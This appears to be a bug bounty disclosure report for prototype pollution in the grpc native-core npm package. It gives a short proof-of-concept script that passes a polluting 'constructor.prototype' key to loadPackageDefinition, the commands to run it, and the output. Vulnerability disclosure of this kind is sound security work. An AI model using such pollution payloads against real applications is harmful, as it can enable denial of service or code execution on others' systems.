Prototype Pollution in grpc-node/native-core

[d3v53c]

✍️ Description

grpc native-core is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.

🕵️‍♂️ Proof of Concept

1. Create the following PoC file:

// poc.js
var grpc =require('grpc')
grpc.loadPackageDefinition({'constructor.prototype.polluted': "Yes! Its Polluted"});
console.log({}.polluted)

2. Execute the following commands in another terminal:

npm i grpc # Install affected module
node poc.js #  Run the PoC

3. Check the Output:

[Function: ServiceClient] { service: 'Yes! Its Polluted' }

💥 Impact

Prototype Pollution leads to Information Disclosure/DoS/RCE.

☎️ Contact

✅ Checklist

• Created and populated the README.md and vulnerability.json files
• Provided the repository URL and any applicable permalinks
• Defined all the applicable weaknesses (CWEs)
• Proposed the CVSS vector items i.e. User Interaction, Attack Complexity
• Checked that the vulnerability affects the latest version of the package released
• Checked that a fix does not currently exist that remediates this vulnerability
• Complied with all applicable laws

[d3v53c]

@JamieSlome , @Mik317 , This issue was already reported and closed. But, the fix applied was apparently merged to another package in the same repository. This vulnerability is still present in the package, though.

Mentioning the relevant PRs, PR #1, PR #2